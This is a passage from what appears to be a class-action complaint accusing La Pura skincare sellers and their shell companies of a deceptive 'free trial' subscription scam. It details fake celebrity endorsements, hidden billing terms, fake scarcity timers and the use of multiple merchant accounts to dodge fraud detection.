81.     SKIN BEAUTY & HEALTH JN, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

82.     SKIN BEAUTY AND BALANCE CD, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

83.     SKIN BEAUTY ENTERPRISE MG, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

84.     SKIN BEAUTY PRODUCTS ISA, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On

information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

85.    SKIN CARE ENTERPRISE TTH, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

86.    SKIN CARE GROUP MK, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

87.    SKIN PRODUCTS RUBIO, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

88.    STRENGTH & FITNESS LIFESTYLE LT, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

89. TOTAL FITNESS & HEALTH MC, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

90. VIBRANT FACE & BEAUTY SHOP ATN, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

91. DEFENDANTS JOHN DOE 1 THROUGH 10 are any other individuals, corporations, or entities responsible for marketing, branding, and/or selling the La Pura Products, and any individuals, corporations, or entities providing the capacity to evade fraud detection through services relating to credit card or debit card processing, or otherwise assisting in the scam (collectively, the "Doe Defendants"). The true names and capacities of the Doe Defendants sued herein as JOHN DOE 1 through 10, inclusive, are currently unknown to Plaintiff, who therefore sues such Defendants by fictitious names. Each of the Doe Defendants designated as a JOHN DOE is legally responsible for the unlawful acts alleged herein. Plaintiff will seek leave of Court to amend this Complaint to reflect the true names and capacities of the JOHN DOE Defendants when such identities become known.

## FACTUAL ALLEGATIONS

### Background on "Free Trial" Scams

92. The Internet has been plagued in recent years by a flood of scams targeting consumers for "free trials" that are anything but free. Relying on fake news articles and fake celebrity endorsements, the scammers convince customers that they are signing up for

a free trial of a product endorsed by a high-profile celebrity. But the customer soon discovers that they are being billed each and every month as part of a subscription they were never properly informed of and never agreed to. These scams are not just deceptive—they are criminal. This lawsuit seeks to shut down a ring of scammers who defrauded an unknown number of people, including the named plaintiff LeAnne Tan.

93.     The Better Business Bureau ("BBB") issued a study in December 2018 titled "Subscription Traps and Deceptive Free Trials Scam Millions with Misleading Ads and Fake Celebrity Endorsements." *See* Exhibit 1 attached hereto. Written by C. Steven Baker, an International Investigations Specialist for the BBB and former Director for the Midwest Region of the Federal Trade Commission, the report explains in detail the tactics used by scammers to exploit customers who are unaware of their fraudulent techniques.

94.     According to the report, these scams have "infested the internet and social media." Ex. 1, at p. 1. The report provides a detailed explanation of how the scams work—one that is virtually identical to the scam that was run by the Defendants here.

95.     "You've seen them on the internet: ads or links leading to pictures of celebrities and products that sound intriguing. The ads claim these 'miracle' products will help you lose weight easily, combat wrinkles or whiten teeth. Often, fraudulent operations involved with these types of ads employ the latest internet marketing techniques and professional looking websites. You may be enticed to try these products through a 'risk-free' trial. You might think they seem like a good deal. You only have to pay $1.95 for shipping and handling. The claims look plausible, and celebrities would not endorse a product unless they believed it works. There may be a risk that the product doesn't work as claimed, but it costs next to nothing to find out. Just enter your name, address and credit card number and act quickly; supplies are limited. Better Business Bureau's (BBB's) in-depth investigative study found that many of these free trial offers are not free. They do not just send free product samples to try. If you can locate and read the fine print on the order page, or the terms and conditions buried by a link, you'll discover that you may have only 14 days to receive, evaluate and return the product to avoid being charged $100 or

more. In addition, the same hidden information may state that by accepting the offer, you've also signed up for monthly shipments of the products. Those also will be charged to your credit card and become subscription traps. Many people find it difficult to contact the seller to stop recurring charges, halt shipments and get a refund." Ex. 1, at p. 1.

96.   This is virtually a verbatim description of the illegal scam the Defendants perpetrated here, as described further below. And as the Better Business Bureau recognized in its study, the sellers of these products are not the only active participants in these scams: "The fraud involves a variety of players, from those who obtain the products to advertisers, shippers and credit card processors." Ex. 1, at p. 1.

97.   For example, the companies involved often hire "affiliates" to place advertisements for them or to create fake celebrity ads, paying them commissions. Ex. 1, at p. 3. Those affiliates are often hired or paid through a separate "affiliate network." *Id.*

98.   The Better Business Bureau describes the role of affiliates and affiliate networks as follows: "Many fake free trial offers use affiliate networks to advertise their products. Someone who wants to drive traffic to their website hires an affiliate network, which in turn hires individual affiliates to place advertising. The affiliates often buy space for ads or sponsored content on popular websites. Clicking on one of these ads will take people to a website where products are sold, or to a 'landing page' that then refers users to the main site for the product. Commissions are paid to the affiliate network, which in turn pays the affiliates. Affiliates can either be paid per click or per order placed. Commissions for these misleading 'free trial' offers can be $30 to $50 for every person who signs up." Ex. 1, at p. 6.

99.   Another typical player in the scam operations is the "fulfillment company" - which is a company that manufactures and ships the products to consumers. The Better Business Bureau study makes clear that these fulfillment companies are active participants: "The free trial offer operations also have to get the product shipped to victims. Often, fraudulent free trial operations use fulfillment companies to ship the products and, presumably, accept returns." Ex. 1, at p. 9.

100.    A final type of participant in these scams are third party companies which assist in preventing the scammers from losing their merchant accounts with credit card companies or otherwise being flagged for their fraud: "Using a crooked processor. Banks that offer credit card processing hire Independent Sales Organizations (ISO's) to solicit and sign up merchants for them. The banks require that these agents comply with detailed rules before opening accounts to determine if they are legitimate and to monitor their activity for signs of fraud, such as reviewing chargeback rates and other suspicious activity. But what if those providing processing services are in on the fraud? The FTC has sued a number of these ISOs over the years, often alleging that these third parties were aware of the fraud or actively assisted in helping a fraudulent company evade the rules of the credit card system. For example, in one FTC case an ISO spread the credit card charges over 26 merchant accounts to disguise the fraud activity." Ex. 1, at p. 11.

101.    The fact that "affiliate marketing" is rife with illegal scam operations is well known in the industry. At the *Affiliate Summit West* in 2019, the preeminent conference for affiliate marketers, the keynote speaker, Neil Patel, repeatedly acknowledged in frank language how widespread such scams are among Internet marketers and among attendees of the conference:[1]

> The sad reality is, at least for a lot of affiliates, the way affiliate marketing was a few years ago isn't gonna exist anymore and it's gonna get tougher and tougher. You know, I remember years ago in San Diego I was meeting some friends and they're like, yeah, we're selling some skin care product, we got to zero to $100 million dollars a year in revenue in twelve months with a brand new company. Those days are long gone. **As you can guess some of those guys probably got hit by the FTC as well.**

102.    Mr. Patel continued:[2]

---

[1] Neil Patel, *The Future of Affiliate Marketing: It's Not What You Think*,
https://www.youtube.com/watch?v=2hUdbztKLY4 at 0:20 (last visited Jan. 3, 2019) (emphasis added).
[2] *Id.* at 5:41.

I've got a marketing blog. I see what a lot of affiliate marketers think 'cause a shit load of 'em hit me up every single day, I think I'm number one on Google for affiliate marketing. I could be wrong, maybe number two. Either way I just get a ton of affiliate marketing traffic. So, let's go over fact number one: how affiliates currently make money. And hopefully you guys don't get offended, I'm just gonna be stating the facts. Churn and burn model with Facebook accounts. You guys know what I'm talking about, you used to pay people fifty bucks, it used to be crazy back in the day, people were paying hundreds of dollars for Facebook accounts and then they would churn and burn 'em. You guys familiar with this? No? I love it, you have the biggest smile and you're like, no, and now you're turning away, you're like don't look at me, hopefully no camera's on me. (LAUGHTER). That's okay. Everyone has to make a livin'. Hopefully you crushed it while you can. **The next model: fake news landing pages. "The Shocking Reason Why Joy Behar Is Quitting The View." Well it's because she took this new wrinkle cream.** (LAUGHTER). She looked ten years younger and now this is what she's selling. **And you know what? Joy's story is so amazing, on that landing page is also a testimonial from her friend Oprah.** (LAUGHTER). On how this wrinkle cream also made Oprah look twenty years younger. And you know what? Oprah also lost ten pounds while taking this wrinkle cream. (LAUGHTER). She was so addicted to it she was taking it at night, but luckily when her power went off she had one of those flashlights, the survival ones. (LAUGHTER). Right? **That's how affiliate marketers make money. And again, I've seen it, there's nothing wrong with it.** Some of you guys do straight sells, so when they click from that Oprah landing page, they go into a straight sell instead of forced continuity. And that's fine as well. And again this is forced continuity, **you tell 'em it's a free trial, but they don't really see in the fine print that they're gonna get billed every single month. And then you target the older demographics who have no idea why they're continually getting rebilled. And then some of you guys have what's called a quote-unquote hell room that just deals with the calls. And the refunds. Or the credit card processors where you guys rotate up the chargebacks so then that way, then you guys can keep processing the money.**

103.   Mr. Patel acknowledged that a widespread FTC crackdown was occurring:[3]

---

[3] *Id.* at 10:10.

The FTC has been cracking down on certain companies and industries, hence you're seeing a lot less forced continuity. You guys, many of you have issues with credit card processing, so you'll do things like, I forgot what the saying is but they rotate up the MIGS or the MIDS, I don't know what the saying is but it's more so they're controlling where the chargebacks are going.

104.   Mr. Patel described the FTC efforts to target not just affiliate marketers but companies such as Facebook:[4]

But they get pressure. 'Cause those old grandmas are like, hey! Facebook screwed me over! They sold me this wrinkle cream! One, I still have my wrinkles. Two, they keep advertising these false products. So they get pressure. The government doesn't just want to stop the companies, they go to the source and say, stop them from advertising.

105.   At a Keynote Panel that followed Mr. Patel's speech, several panelists who operate affiliate networks addressed the same issue. An audience member who was inexperienced in the industry posed the following question about the fake news articles used by many affiliate marketers:[5]

**Ok, I'm relatively new to the affiliate game myself**. Uh, I started my business at home, and I have to say that I'm very pleased with the industry coming out of 25 years of health care. So, my question is, what are the regulations from the Federal Trade Commission that publishers are gonna have to deal with that's gonna impact our revenue? And is the fed—you guy's dealing with the Federal Trade Commission, would that impact us? You guys. If there was something that you guys had—you had to deal with, that, would that impact the way we do business with you? .... What is the government looking at as far as publishers, you know, I mean, what do we, what, in the next five years, is gonna be the regulations for us in content? **Like the fake news stuff. Everybody talk about the fake news, but nobody even, like, call people who put fake news out. Nobody calls 'em on it. You know, they continue to do it. If I wanted to put something up about one'a you guys,**

---

[4] *Id.* at 16:16.
[5] Affiliate Summit West 2019 Keynote Panel, https://www.youtube.com/watch?v=6KRA8fL6hp0&t=281s, at 50:02 (last visited Feb. 9, 2020) (emphasis added).

**fake news, what would stop that? You know? What type'a federal laws are gonna be put in place to keep that from happening?**

106.   The inexperienced audience member may not have understood why these illegal practices were being tolerated by the industry, but the panel knew perfectly well. And their response gave away the game. Todd Crawford, the Vice President of Strategic Initiatives at Impact Radius, a company that connects affiliates to advertisers, responded as follows:[6]

> Well, you know, the FTC requires you to disclose that you're earning money from your links, that you may be earning money for referring sales. **You know, if you're promoting fake news, I think that's more of a brand decision or maybe a network decision on their policy of what they accept.** I mean, we even have criteria that, in our marketplace environment, you have to, you know, you can't do certain things that maybe a brand would work with you direct through. So, it, I think there's no simple answer there but the big picture is the disclosures by the FTC, because they're going to come after you.

107.   Earlier in the panel, Mr. Crawford commented on a question about what affiliate networks do when fraud is detected on their networks:[7]

> Well, for example, this is years ago. I helped found Commission Junction. So when I was working there, a very large publisher violated the agreed upon terms that everybody else in here had agreed to, and we kicked 'em out for over a year, and no other network did anything.... [I]n the U.S., it's so spread out, and it is kinda this every man or woman for themselves. And they're gonna run their business how they want. I'm all for it, but...

108.   Mr. Crawford's statements make clear that the companies that are supporting the celebrity "free trial" scammers are making a policy decision to allow that conduct to occur on their networks. And he further makes clear that some businesses have chosen not

---

[6] *Id.* (emphasis added).
[7] *Id.* at 21:44.

to work with these scammers, and that they are perfectly capable of doing so. The companies that work with "free trial" scammers are making voluntary, intentional, and knowing decisions to do so—and they are making that choice because it is an extremely profitable one.

109.   Tellingly, both the QuickBox Defendants' and the Konnektive Defendants' representatives attended the *Affiliate Summit West* in Las Vegas, where Mr. Patel was the keynote speaker.[8]

110.   The attitude of Mr. Patel and others in the affiliate marketing "industry" that "there's nothing wrong with" this behavior is deeply disturbing: there is in fact something quite wrong with targeting the unwitting consumer, the poor, and the elderly with fake celebrity advertisements and fake "free trials" for the purpose of defrauding their credit cards for as long as possible until the victim finally notices. It is little more than outright theft conducted under the barest fig leaf of a "business"—and it is precisely what the Defendants were doing here.

111.   These free trial scams generally involve more than one individual or companies conspiring together and playing the roles described above. Believing that they can pretend that their affiliates are independent contractors, or that they can pretend to see no evil and hear no evil and thus escape legal liability, the conspirators work together as a group to profit from the fraud. But they are quite wrong to believe that they are safe—every member of these conspiracies knows full well what they are doing, and every member is jointly and severally liable for the conduct of the others.

### Plaintiff LeAnne Tan's Experience With The
### La Pura "Free Trial" Scam

112.   On or about January 10, 2020, Plaintiff LeAnne Tan received a fake text message purportedly from Amazon claiming that if she completed an online survey, she

---

[8] https://www.facebook.com/1642178399129835/posts/asw-2019-will-we-see-you-in-las-vegas-this-year-/2481592371855096/.

would receive a free gift.  The "free" gift was a cosmetics product called "La Pura." The advertisement claimed she would only pay $4.94 for shipping the product as a "free trial." The advertisement did not disclose the recurring monthly payments which the Defendants intended to charge her.

113.   Ms. Tan completed the survey and clicked on the advertisement to receive the gift. She was taken to La Pura's website order page, which added two more products to her "free" gift order and did not provide an option for Ms. Tan to remove the additional products. At no time did Ms. Tan ever agree to sign up for a subscription for future products.

114.   Believing that she was only ordering her "free" gift, Ms. Tan clicked the "complete my order" box. The same day, she received an email from info@la-pura-skinproducts.com, stating her order was currently being processed and would be shipped within one to two business days.  Tellingly, the email stated the order would appear on Ms. Tan's credit card statement as three different merchant accounts:   (1) beautifullyremarkableh; (2) beautyhealthremarkable; and  (3) skincarehealthybeautygroup. The email did not specify the names of the products ordered or the amount charged to Ms. Tan's credit card.  The email claimed La Pura had "24 Hour Customer Support" with a customer service telephone number: (833) 409-5510 and email address: info@la-pura-skinproducts.com.

115.   Immediately, Ms. Tan emailed La Pura's customer service to confirm she was only charged the advertised shipping cost of $4.94 for her "free" gift, and she did not want the two additional products. She instructed La Pura to remove the additional products if La Pura was going to charge her.  Ms. Tan did not receive a response.

116.   The same day, Ms. Tan received a second email from info@la-pura-skinproducts.com, informing her that "one or more of your items" had shipped via the United States Postal Service. The shipping email listed three La Pura products and their SKU numbers: (1) La Pura Wrinkle Freezing Moisturizer; (2) La Pura Instant Lifting Eye

Serum; and (3) La Pura Instant Tightening Serum. The shipping email did not list any prices for these products.

117.    For the second time, Ms. Tan emailed La Pura's customer service at info@la-pura-skinproducts.com, and asked how much she was being charged. Again, Ms. Tan did not receive a response.

118.    On January 26, 2020, Ms. Tan's credit card was charged $88.46 from a merchant account titled "Beautifullyremarkableh" with the date of January 24, 2020.

119.    The next day, January 27, 2020, Ms. Tan's credit card was charged $84.37 from a different merchant account titled "Beautyhealthremarkable" with a different date of January 26, 2020.

120.    Upon discovery of the unauthorized charges, Ms. Tan contacted La Pura's customer service and demanded a full refund. The representative initially refused to provide any refund based on the pretext that Ms. Tan had used the products. Despite her request for a full refund, the representative stated that they would refund her only 70% of the total amount charged. Ms. Tan asked the representative why no one responded to her multiple emails to customer service, to which the representative responded that "no one" checks the company's email inbox.

121.    The total amount charged to Ms. Tan's credit card was $172.83. Ms. Tan received a refund of $120.97 in the form of two "credit vouchers" which appeared on her credit card on January 27, 2020 and January 28, 2020. She received no refund for the remaining amount of $51.86.

122.    Soon thereafter, Ms. Tan was forced to cancel her credit card to avoid the risk of further charges.

123.    Ms. Tan was injured by Defendants' misrepresentations and unfair and unlawful business practices. She suffered a loss of time, inconvenience, and a loss of money. She further paid more for the products than she would have had she been aware that Defendants' representations were false, and ended up with products that were

overpriced, inaccurately marketed, and did not have the characteristics, qualities, or value promised by Defendants, and therefore suffered injury in fact.

### The La Pura Scam

124.   The "sales funnel" for the La Pura products is typical of the free trial scams about which the Federal Trade Commission and Better Business Bureau have issued repeated warnings to consumers. A sales funnel is a series of websites or advertisements which lead a customer through a purchase.

125.   The first step in the sales funnel for La Pura is when a victim initially encounters an advertisement for the product through a third-party, such as Facebook or Snapchat or a text message, which takes the victim to the product's landing page. In the case of Ms. Tan, this involved receiving a fake text message purportedly from Amazon, which claims if the victim completes an online survey, the victim will receive a "free" gift of a product and only pay for shipping. The victim is then taken to the product's landing page to complete the order.

126.   Many of these landing pages are hidden from search engines, they are made inaccessible to anyone who does not view an advertisement, or they are deleted after a few weeks or months to avoid detection. While the specific landing page Ms. Tan viewed is unknown, there are two known landing pages for La Pura.[9]

127.   One step that is common in the funnel is to view an "affiliate page." One known La Pura affiliate page is titled "Why Every Judge On Shark Tank Backed This $4.94 Product."[10] The site is designed to mimic the format of a legitimate news article, presumably on the E! Online media channel, with a logo at the top for "Entertainment Today – Insider News." A banner running across the top of the screen claims that La Pura has been featured in a variety of legitimate publications: The New York Times, Today, O

---

[9] La Pura Landing Pages, https://www.try-la-pura-skincare.com/lm/ (last visited May 16, 2020) and https://www.try-la-pura-skincare.com/l3/ (last visited May 16, 2020).
[10] La Pura Affiliate Page,
https://eonlinenews.co/US/Entertainment/Shark/Skin/lapura/web/index.html (last visited May 16, 2020).

Magazine, StyleWatch, and Redbook. A pop-up banner at the bottom urges victims to "Click to get your <u>FREE</u> Kit."



128.   The fake news article claims that the Shark Tank judging panel "unanimously decided to each invest millions of dollars" in La Pura, which was purportedly a company run by two sisters named Anna and Samantha Martin. In fact, there are no such sisters: the women pictured are Shelly Hyde and Kara Haught of Raising Wild Swimwear, who appeared on Shark Tank in Season 8, but who have no affiliation with La Pura.[11]

---

[11] *Raising Wild: What Happened To Bathing Suit Sisters After Shark Tank*, 2Paragraphs, https://2paragraphs.com/2017/10/raising-wild-bathing-suit-sisters-schooled-by-corcoran-after-shark-tank-as-founders-learn-to-prioritize-launch-sunglasses/ (last visited May 16, 2020).

129.   The fake news article claims that the Shark Tank judges were amazed at La Pura, and "clinical trials of La Pura Cream have uncovered that women who used the La Pura Cream were able to drastically reduce the signs of aging wand with continued use prevented the signs from reoccuring"—a complete falsity. It features a photo of six of the "sharks," Mark Cuban, Robert Herjavec, Barbara Corcoran, Lori Greiner, Daymond John, and Kevin O'Leary. The "sharks" are pictured toasting with champagne, presumably to their new investment in La Pura. The website goes on to claim endorsements from a number of other celebrities, not just the Shark Tank cast. For example, Oprah Winfrey is quoted as calling La Pura "groundbreaking" and "the only company in the world who can effectively remove the signs of aging in a safe and healthy manner."[12]

### CELEBRITIES LOVE La Pura Cream



*"La Pura Cream is ground-breaking. They are the only company in the world who can effectively remove the signs of aging in a safe and healthy manner." - Oprah Winfrey*

---

[12] La Pura Affiliate Page,
https://eonlinenews.co/US/Entertainment/Shark/Skin/lapura/web/index.html (last visited May 16, 2020).

130.   Other celebrities are pictured as endorsers as well.  Megan Mullally is quoted as having used La Pura herself and she is "amazed at the change in the condition of my skin." Sandra Bullock is quoted as being in "love" with La Pura, Ellen DeGeneres is quoted as filming episodes of her shows "completely make-up free" because "my skin looks incredible" as a result of La Pura, and Eva Longoria is quoted as having "a few lines forming around my eyes and mouth, but a few weeks of using La Pura Cream completely erased them."



*"I love taking care of myself and I've used countless beauty products. I'm addicted! But nothing works even half as well as La Pura Cream. I had a few lines forming around my eyes and mouth, but a few weeks of using La Pura Cream completely erased them!"* - **Eva Longoria**

131.   The affiliate page could not be more clear in representing to the victims that what they are signing up for is free, that La Pura is "giving away samples," and that the "only cost you will incur is the discounted shipping rate of $4.94."

**GIVE YOURSELF THE STAR TREATMENT**

For a limited time anyone can try La Pura Cream for free!

That's right, La Pura Cream are giving away samples of their Instant Wrinkle Reduction Cream for **FREE.**

The only cost you will incur is the discounted shipping rate of $4.94. The cream will then be delivered straight to your door and ready to use immediately.

Remember it's important that you use the La Pura Cream to achieve the full anti-aging results.

This offer won't last for long so make sure you follow the link below to claim your trial bottle today before they all run out!

132.   The affiliate page also repeatedly claims that there is a limited supply of La Pura remaining, and urges victims to act quickly before it runs out. Victims are told that the Trial Bottle Promotion will end on a specific date—but that date itself is a misrepresentation. There is in fact no end date. The website code simply automatically inserts the current date as the purported end of the free trial.[13] Victims are again presented with a picture of La Pura and told that they will be signing up for a "Free Sample" and that they will "pay only **$4.94** for shipping!"



133.   And finally, victims are presented with a serious of fake reviews at the bottom of the page purporting to come from real customers of La Pura.



---

[13] *Id.*

134.   On information and belief, victims of La Pura who purchased from the La Pura website were all subjected to representations that are similar or identical in substance, and were then funneled from affiliate pages such as this one to a second landing page hidden on a La Pura website.

135.   The "Shark Tank" affiliate page is no longer linked to a La Pura landing page, but on information and belief, that URL was either https://www.try-la-pura-skincare.com/lm/ or https://www.try-la-pura-skincare.com/l3/ - both landing pages which were operated by the La Pura Defendants and their group of shell companies.  The existence of these landing pages is not immediately apparent to anyone other than the victims. Anyone who wanted to visit La Pura's main website, www.try-la-pura-skincare.com— which was deliberately made inaccessible—would be unable to find the landing pages and would never even know they existed.

136.   A partial image of one of two La Pura landing pages, https://www.try-la-pura-skincare.com/lm/, appears below:[14]



_____

[14] La Pura Website, https://www.try-la-pura-skincare.com/lm/ (last visited May 16, 2020).

137.   If a user visits this landing page on a desktop computer, there is a link to a terms of service buried at the bottom of the screen, below the fold, which requires users to scroll down to see it. The text linking to that terms of service is set in gray text with a grey background and made intentionally difficult to see. It is further combined with several other links, and the text color is identical to a lengthy nearby paragraph (meaning that it is not at all obvious that it is even a clickable link).



138.   If a user visits the landing page on a mobile device, which now constitutes the vast majority of Internet traffic, there are no terms of service or disclaimers visible whatsoever. Instead, a pop-up covers the bottom portion of the screen, encouraging victims to click to "Get Free Bottle" where they are taken to another "shipping information" page and asked for their full name, address, phone number, and email address.



139.   At the very bottom of this order page, there is a "TERMS" hyperlink.



140.    Again, the font is in tiny text, set to be the same color as the nearby paragraphs so that victims will not realize it is a link, and to even see it requires victims to scroll down to the bottom of the page and past the order form itself. Nowhere in the ordering process on either desktop or mobile is the victim required to check a box to agree to this terms of service or to otherwise indicate any form of assent.

141.    Buried in the lengthy terms of service is a section entitled, "Product & Billing," which states that everything the victims were being told on the website itself about the La Pura sample being "free" is in fact false: they must cancel within 14 days of their order or they will be billed an additional $88.46 "for your initial order," and, in fact, they only have 10 days to cancel because shipping will take 4 days. The terms of service further states that if the customer does not cancel within the 14-day period, La Pura will automatically bill the customer $93.42 every thirty days for a new 30-day supply of the product.

142.    Users signing up for a trial of La Pura through this landing page are subjected to a number of false or misleading representations. Most reprehensible is the fact that victims are never told they will be signed up for a monthly subscription for the product costing them $93.42 a month. In fact, they are told exactly the opposite: that they will "[j]ust pay a small shipping fee." And on the check-out page, victims are shown a graphic stating unambiguously that the price they will pay is "FREE," with $4.97 for "Shipping & Handling."





143.   A few weeks later, victims who were told that they would pay only a small shipping fee for the La Pura product are understandably shocked to see their credit card billed for an additional $88.46 to which they did not agree.  If they do not immediately call to cancel, they find themselves being billed endlessly, each and every month. This is nothing more than credit card fraud—lying to customers about what they will pay, taking their credit card information, and billing them for something they never agreed to. But this is just the beginning of the Defendants' misrepresentations.

144.   Victims are falsely told that La Pura has been "featured in" a number of magazines, including Marie Claire, Vogue, Cosmopolitan, Elle, and New You.



145.   This misrepresentation is meant to dovetail with the fake celebrity affiliate ads, which the Defendants know their victims will see as part of the sales funnel.

146.   The landing page also presents a series of fake "before and after" photos. These photos are labeled as "Real People" and "Real Results." But on information and belief, none of them are in fact La Pura customers. For example, "Annie," who supposedly used La Pura to restore her skin, is in fact journalist Emily Rekstis, who posted the before and after photo of herself below on an article she wrote for Self magazine about her experience with a 10-Step Korean beauty regime involving a number of products, but not La Pura.[15]



147.   Victims are told that La Pura has been "clinically proven" to help their skin in a number of ways, including boosting hydration and nourishment, repairing and revitalizing damaged skin, restoring elasticity and firmness, lifting and plumping sagging skin, and eliminating wrinkles and fine lines. On information and belief, La Pura has not in fact been clinically proven to do any of these things, and in fact it cannot do any of them.

---

[15] Emily Rekstis, *I Tried a 10-Step Korean Skin-Care Regimen for a Week, and Here Are the Results*, Mar. 26, 2016 (https://www.self.com/story/how-to-do-10-step-korean-skincare-routine?mbid=social_facebook) (last visited May 21, 2020).

148.   Victims are also repeatedly told that the supply of La Pura is limited. On the landing page, a banner at the top of the page states: "WARNING: due to extremely high demand, there is limited supply of Product in stock as of [DATE]."[16] The website is programmed to automatically insert whatever the current date is, regardless of whatever the current supply of La Pura actually is.

**WARNING:** Due to extremely high demand, there is limited supply of Product in stock as of **Saturday, May 16, 2020**

149.   When a victim proceeds to the check-out page, they are presented with a graphic with red highlight supposedly describing the Sell-Out Risk as "HIGH."

In Stock
Sell Out Risk: **HIGH**

150.   Also on the check-out page is a graphic urging them to get their "free" bottle "while supplies last."



---

[16] La Pura Website, https://www.try-la-pura-skincare.com/lm/ (last visited May 16, 2020).

151.   A timer at the top of the check-out page counts down from five minutes, warning consumers that it is a "limited time offer." But in fact, the timer is a fake—at the end of the countdown, nothing happens, and the consumer can still sign up for the offer.



152.   The second known landing page for La Pura is https://www.try-la-pura-skincare.com/l3/. This page is a common template used by free trial scammers according to the BBB, *see* Ex. 1 at 6, and it contains similar representations to the "lm" landing page shown above.



153.   Just like the "lm" landing page, the desktop version of the "l3" landing page features a link to a terms of service buried at the bottom of the screen, below the fold, which requires users to scroll down to see it. The text linking to that terms of service is combined with several other links, and the text color is identical to a lengthy nearby paragraph (meaning that it is not at all obvious that it is even a clickable link). On the mobile version of the "l3" landing page, the terms of service is visible, but again requires scrolling to the bottom of the page, and it is unclear that it is a link. Neither the mobile or desktop version of the "l3" landing page requires any check box or other act of assent by the victim.

154.   The "l3" landing page makes similar misrepresentations as the "lm" landing pages to the La Pura victims. Consumers again told both that there is a limited supply, that there is a time limit, and are told that La Pura has been the subject of "recent media coverage." And again, the current date is simply automatically inserted by the source code.

> **ATTENTION: Due to high demand from recent media coverage we can no longer guarantee supply.**
> **As of Thursday, May 21, 2020 we currently have product in-stock and will ship within 24 hours of purchase.**

155.   The "l3" page makes similar representations that the product can alter the functionality and appearance of human skin.



156.   After victims click on "Rush My Trial" on the "l3" landing page and enter their personal information, they are taken to a check-out page. An image of the "l3" check-out page appears below.



157.   As with the "lm" landing page, the "l3" check-out page repeats the urgency that consumers must "Act now" because the Current Availability is "LOW STOCK" and the Sell-out Risk is "HIGH." A prominent arrow claims there are "LIMITED QUANTITIES AVAILABLE."

158.   And as with the "lm" landing page, the "l3" check-out page repeatedly calls the offer a "trial" and falsely represents to consumers that they will pay "$0.00" for the product, and will only pay a small shipping and handling fee.

159.   Once again, consumers signing up for a "free trial" of La Pura through this landing page are subjected to a number of false or misleading representations, including that they only will pay a small shipping fee, when in truth they have been auto-enrolled for a monthly subscription.

**The La Pura Defendants'**
**"False Front" Websites**

160.   Just as an old-time speakeasy would maintain a false front of a legitimate business operation to distract law enforcement from their criminal activities, the La Pura Defendants also operate other websites whose sole purpose is to trick anyone conducting an investigation into the validity of these purchases, including a bank or credit card company deciding whether to grant a chargeback to a consumer who complains. The La Pura Defendants further operate hundreds of "false front" websites for non-existent products which, on information and belief, were used to apply for hundreds of separate merchant accounts for the purpose of avoiding fraud detection.

161.   Plaintiff Tan was billed from three separate merchant accounts: (1) beautifullyremarkableh; (2) beautyhealthremarkable; and (3) skincarehealthybeautygroup. This is itself a glaring red flag: an ordinary company does not need to maintain three different merchant accounts to bill their customers. But the La Pura Defendants maintained **hundreds** of such merchant accounts under a host of shell companies, using them in a churn-and-burn scheme to commit bank fraud and injure the Class.

162.   The company which billed Ms. Tan from the "beautifullyremarkableh" merchant account is, on information and belief, Total Health Supply TUA, Inc., a company that is nominally located in Santa Ana, CA. The company operates a website called beautifullyremarkablehealthyskin.com, which bills under the merchant account "beautifullyremarkablehealthyskin."[17] On information and belief, this account name was truncated in an e-mail sent to Ms. Tan. The website purports to be for a product line of creams and serums called Beautifully Remarkable Healthy Skin—but on information and belief, none of them actually exist. Instead, the website and the company were both a sham,

---

[17] Beautifully Remarkable Healthy Skin Website, https://beautifullyremarkablehealthyskin.com/policies/terms-of-service (last visited May 23, 2020).

used to apply for merchant accounts which were instead used to bill victims for the La Pura products.

163.   The company which billed Ms. Tan from the "beautyhealthremarkable" merchant account is also Defendant Total Health Supply TUA Inc. The company operates a website called beautyhealthremarkableskin.com, which states in its terms of service that customers will be billed using the "beautyhealthremarkable" merchant account.[18] The website purports to be for a product line of creams and serums called Beauty Health Remarkable—but on information and belief, none of them actually exist. Instead, the website and the company were both a sham, used to apply for merchant accounts which were instead used to bill victims for the La Pura products.

